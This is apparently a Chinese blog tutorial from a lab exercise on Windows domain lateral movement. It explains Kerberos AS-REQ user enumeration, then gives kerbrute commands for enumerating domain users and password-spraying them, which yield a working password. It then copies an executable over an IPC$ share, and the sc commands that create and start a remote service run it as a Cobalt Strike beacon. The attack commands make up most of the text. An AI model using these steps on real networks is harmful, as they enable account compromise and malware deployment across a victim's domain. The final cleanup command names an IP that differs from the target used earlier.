内网渗透-横向移动-密码喷洒攻击和域内用(kerbrute使用)

域内用户枚举攻击原理

正常域用户登录主机,我们可以通过 "net user /domain"来列举出域内的用户。但是当我们用非域用户进行登录时,是不能使用 "net user /domain"这条命令的。或者当主机不在域内但是能与域控通信时,以上两种情况我们可以通过以下方法对域内用户进行枚举。

Kerberos本身是一种基于身份认证的协议,在 Kerberos 协议认证的 第一阶段AS-REQ ,当用户不存在时,返回包提示错误。当用户名存在,密码正确和密码错误时,AS-REP的返回包不一样。所以可以利用这点,对域内进行域用户枚举和密码喷洒攻击。在AS-REQ阶段客户端向AS发送用户名,AS对用户名进行验证,用户存在和不存在返回的数据包不一样,所以,根据AS的返回包来对域用户进行枚举

实验目标:

把非域内主机横向到域内主机

实验步骤

1.上传kerbrute.exe工具和密码字典

2.使用kerbrute.exe工具爆破域内用户名

kerbrute.exe userenum --dc 域控ip -d 域名 用户名字典.txt

shell C:\Users\31979\Desktop\kerbrute.exe userenum --dc 192.168.113.152 -d test.com C:\Users\31979\Desktop\user.txt

找到jack和krbuser

3.密码喷洒攻击找到用户密码

密码喷洒攻击原理

在确认用户存在后,客户端又会发送一个AS-REQ请求,如果密码正确,则返回AS-REP。否则返回KRB5KDC_ERP_PREAUTH_FAILED

在常规的爆破中,我们都是先用很多密码去碰撞一个账号,这样很容易导致账号被锁定。而密码喷洒就是先用一个密码去碰撞很多账号,此方法能有效的避免账号被锁定的问题

kerbrute.exe passwordspray -d 域名 用户字典 密码

shell C:\Users\31979\Desktop\kerbrute.exe passwordspray -d test.com C:\Users\31979\Desktop\user.txt qax@123

成功找到这两个用户的密码,那我们在这个域中,就可以直接登录他们的机器了

4.得到用户密码后,让该主机在cs上线

先用 net use 挂载 IPC$ 授权,再 copy

shell net use \\192.168.113.154\C$ /user:krbuser qax@123

shell copy 123.exe \\192.168.113.154\C$\

配合系统服务横向移动

sc \\192.168.113.154 create test binpath= "cmd.exe /c c:\123.exe"

sc \\192.168.113.154 start test

成功上线

删除服务

sc \\192.168.17.138 delete test

相关推荐
Smoothcloud润云4 分钟前
GPU服务器租用实例DNS与HTTPS下载排障实战
大数据·运维·服务器·人工智能·https·gpu算力
威胁猎人8 分钟前
网络水军产业风险研究报告
网络
独钓寒江雨11 分钟前
路由器单MAC多IP支持功能未开启致业务异常
网络·数通·故障·中兴·m6000·单mac多ip
Apipi*14 分钟前
30天速通Linux 第五章Linux 进程管理
linux·运维·服务器
杨云龙UP18 分钟前
PostgreSQL 四种常见部署模式快速理解:单实例、流复制、repmgr、Patroni
linux·运维·数据库·postgresql·流复制·高可用ha
白帽攻防录18 分钟前
SRC 挖洞:TanStack Start 服务器函数 XSS 深度复盘,CVE-2026-102989 怎么窃取用户会话
运维·服务器·网络安全·xss
资深电气设计33 分钟前
ABB AFC/AF/AX系列接触器在数据中心液冷机组中的负载适配技术
运维·物联网·创业创新·业界资讯
桀人34 分钟前
USART帧格式
网络·stm32·单片机·嵌入式硬件
.冰块.41 分钟前
MySQL下篇 运维实战:备份恢复 + 主从复制 + MHA 高可用,含完整拓扑
运维·mysql·读写分离·高可用·主从复制·mha
FITA阿泽要努力1 小时前
第 1 周·第 3 讲|工具如何交给模型:工具定义、参数与结构化调用
服务器·数据库·python·agent